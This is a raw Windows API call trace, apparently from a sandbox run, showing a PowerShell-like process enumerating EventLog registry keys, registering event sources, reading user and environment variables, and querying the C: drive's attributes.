	[0431.535] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d168 | out: phkResult=0x24d168*=0x368) returned 0x0
	[0431.535] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d0dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d0d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d0dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d0d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.535] CoTaskMemFree (pv=0x0) 
	[0431.535] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.535] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x0, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.535] CoTaskMemFree (pv=0x4238e0) 
	[0431.535] CoTaskMemFree (pv=0x0) 
	[0431.535] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.535] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x1, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.536] CoTaskMemFree (pv=0x4238e0) 
	[0431.536] CoTaskMemFree (pv=0x0) 
	[0431.536] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.536] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x2, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.536] CoTaskMemFree (pv=0x4238e0) 
	[0431.536] CoTaskMemFree (pv=0x0) 
	[0431.536] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.536] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x3, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.536] CoTaskMemFree (pv=0x4238e0) 
	[0431.536] CoTaskMemFree (pv=0x0) 
	[0431.536] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.536] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x4, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.536] CoTaskMemFree (pv=0x4238e0) 
	[0431.536] CoTaskMemFree (pv=0x0) 
	[0431.536] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.536] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x5, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.536] CoTaskMemFree (pv=0x4238e0) 
	[0431.536] CoTaskMemFree (pv=0x0) 
	[0431.536] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.536] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x6, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.536] CoTaskMemFree (pv=0x4238e0) 
	[0431.536] CoTaskMemFree (pv=0x0) 
	[0431.536] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.537] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x7, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.537] CoTaskMemFree (pv=0x4238e0) 
	[0431.537] CoTaskMemFree (pv=0x0) 
	[0431.537] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.537] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x8, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.537] CoTaskMemFree (pv=0x4238e0) 
	[0431.537] CoTaskMemFree (pv=0x0) 
	[0431.537] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x344) returned 0x0
	[0431.537] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.537] RegOpenKeyExW (in: hKey=0x368, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x36c) returned 0x0
	[0431.537] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.564] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x30c) returned 0x0
	[0431.564] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.564] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x32c) returned 0x0
	[0431.564] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.564] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x330) returned 0x0
	[0431.564] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.564] RegOpenKeyExW (in: hKey=0x368, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x334) returned 0x0
	[0431.565] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.565] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x338) returned 0x0
	[0431.565] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.565] RegOpenKeyExW (in: hKey=0x368, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x344) returned 0x0
	[0431.565] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.565] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x348) returned 0x0
	[0431.565] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x34c) returned 0x0
	[0431.565] RegCloseKey (hKey=0x34c) returned 0x0
	[0431.566] RegCloseKey (hKey=0x368) returned 0x0
	[0431.566] RegCloseKey (hKey=0x348) returned 0x0
	[0431.567] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d138 | out: phkResult=0x24d138*=0x348) returned 0x0
	[0431.567] RegQueryInfoKeyW (in: hKey=0x348, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d0ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d0a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d0ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d0a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.567] CoTaskMemFree (pv=0x0) 
	[0431.567] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.567] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x0, lpName=0x4238e0, lpcchName=0x24d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.567] CoTaskMemFree (pv=0x4238e0) 
	[0431.567] CoTaskMemFree (pv=0x0) 
	[0431.567] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.567] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x1, lpName=0x4238e0, lpcchName=0x24d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.567] CoTaskMemFree (pv=0x4238e0) 
	[0431.567] CoTaskMemFree (pv=0x0) 
	[0431.567] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.567] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x2, lpName=0x4238e0, lpcchName=0x24d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.567] CoTaskMemFree (pv=0x4238e0) 
	[0431.567] CoTaskMemFree (pv=0x0) 
	[0431.568] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.568] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x3, lpName=0x4238e0, lpcchName=0x24d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.568] CoTaskMemFree (pv=0x4238e0) 
	[0431.568] CoTaskMemFree (pv=0x0) 
	[0431.568] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.568] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x4, lpName=0x4238e0, lpcchName=0x24d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.568] CoTaskMemFree (pv=0x4238e0) 
	[0431.568] CoTaskMemFree (pv=0x0) 
	[0431.568] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.568] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x5, lpName=0x4238e0, lpcchName=0x24d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.568] CoTaskMemFree (pv=0x4238e0) 
	[0431.568] CoTaskMemFree (pv=0x0) 
	[0431.568] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.568] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x6, lpName=0x4238e0, lpcchName=0x24d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.568] CoTaskMemFree (pv=0x4238e0) 
	[0431.568] CoTaskMemFree (pv=0x0) 
	[0431.568] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.568] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x7, lpName=0x4238e0, lpcchName=0x24d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.568] CoTaskMemFree (pv=0x4238e0) 
	[0431.568] CoTaskMemFree (pv=0x0) 
	[0431.568] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.568] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x8, lpName=0x4238e0, lpcchName=0x24d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.568] CoTaskMemFree (pv=0x4238e0) 
	[0431.568] CoTaskMemFree (pv=0x0) 
	[0431.568] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x368) returned 0x0
	[0431.569] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x0) returned 0x2
	[0431.569] RegOpenKeyExW (in: hKey=0x348, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x34c) returned 0x0
	[0431.569] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x0) returned 0x2
	[0431.569] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x350) returned 0x0
	[0431.569] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x0) returned 0x2
	[0431.569] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x354) returned 0x0
	[0431.569] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x0) returned 0x2
	[0431.569] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x358) returned 0x0
	[0431.569] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x0) returned 0x2
	[0431.570] RegOpenKeyExW (in: hKey=0x348, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x35c) returned 0x0
	[0431.570] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x0) returned 0x2
	[0431.570] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x360) returned 0x0
	[0431.570] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x0) returned 0x2
	[0431.570] RegOpenKeyExW (in: hKey=0x348, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x364) returned 0x0
	[0431.570] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x0) returned 0x2
	[0431.570] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x2f4) returned 0x0
	[0431.570] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x2f8) returned 0x0
	[0431.570] RegCloseKey (hKey=0x2f8) returned 0x0
	[0431.571] RegCloseKey (hKey=0x348) returned 0x0
	[0431.571] RegCloseKey (hKey=0x2f4) returned 0x0
	[0431.574] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b920008
	[0431.682] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x330b488*="WSMan", lpRawData=0x330b1f8) returned 1
	[0431.682] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0431.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.682] CoTaskMemFree (pv=0x49d6c0) 
	[0431.683] CoTaskMemAlloc (cb=0x804) returned 0x1b84a7a0
	[0431.683] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84a7a0, nSize=0x24d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d428) returned 0x1
	[0431.683] CoTaskMemFree (pv=0x1b84a7a0) 
	[0431.683] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.683] GetUserNameW (in: lpBuffer=0x4238e0, pcbBuffer=0x24d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d468) returned 1
	[0431.684] CoTaskMemFree (pv=0x4238e0) 
	[0431.684] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3310e68*="Alias", lpRawData=0x3310bf8) returned 1
	[0431.684] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0431.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.684] CoTaskMemFree (pv=0x49d6c0) 
	[0431.685] CoTaskMemAlloc (cb=0x804) returned 0x1b84a7a0
	[0431.685] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84a7a0, nSize=0x24d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d428) returned 0x1
	[0431.685] CoTaskMemFree (pv=0x1b84a7a0) 
	[0431.685] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.685] GetUserNameW (in: lpBuffer=0x4238e0, pcbBuffer=0x24d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d468) returned 1
	[0431.686] CoTaskMemFree (pv=0x4238e0) 
	[0431.686] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3316460*="Environment", lpRawData=0x33161f0) returned 1
	[0431.686] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0431.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.686] CoTaskMemFree (pv=0x49d6c0) 
	[0431.687] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0431.687] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0431.687] CoTaskMemFree (pv=0x49d6c0) 
	[0431.687] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0431.687] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0431.687] CoTaskMemFree (pv=0x49d6c0) 
	[0431.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x24cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0431.687] SetErrorMode (uMode=0x1) returned 0x1
	[0431.687] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x24d1e0 | out: lpFileInformation=0x24d1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0431.688] SetErrorMode (uMode=0x1) returned 0x1
	[0431.688] GetLogicalDrives () returned 0x4
	[0431.688] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.689] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0431.689] SetErrorMode (uMode=0x1) returned 0x1
	[0431.689] CoTaskMemAlloc (cb=0x68) returned 0x48e1a0
	[0431.689] CoTaskMemAlloc (cb=0x68) returned 0x48e6e0
	[0431.689] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x48e1a0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x24d1b0, lpMaximumComponentLength=0x24d1ac, lpFileSystemFlags=0x24d1a8, lpFileSystemNameBuffer=0x48e6e0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24d1b0*=0x9c354b42, lpMaximumComponentLength=0x24d1ac*=0xff, lpFileSystemFlags=0x24d1a8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0431.690] CoTaskMemFree (pv=0x48e1a0) 
	[0431.690] CoTaskMemFree (pv=0x48e6e0) 
	[0431.690] SetErrorMode (uMode=0x1) returned 0x1
	[0431.690] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0431.690] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.690] SetErrorMode (uMode=0x1) returned 0x1
	[0431.690] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d150 | out: lpFileInformation=0x24d150*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0431.691] SetErrorMode (uMode=0x1) returned 0x1
	[0431.691] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.691] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.691] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0431.691] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.691] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0431.691] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.692] SetErrorMode (uMode=0x1) returned 0x1
	[0431.692] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24cf80 | out: lpFileInformation=0x24cf80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0431.692] SetErrorMode (uMode=0x1) returned 0x1
	[0431.692] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.692] SetErrorMode (uMode=0x1) returned 0x1
	[0431.692] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24cf80 | out: lpFileInformation=0x24cf80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0431.692] SetErrorMode (uMode=0x1) returned 0x1
	[0431.692] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.692] SetErrorMode (uMode=0x1) returned 0x1
	[0431.692] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d020 | out: lpFileInformation=0x24d020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0431.693] SetErrorMode (uMode=0x1) returned 0x1
	[0431.693] CoTaskMemAlloc (cb=0x804) returned 0x1b84a7a0
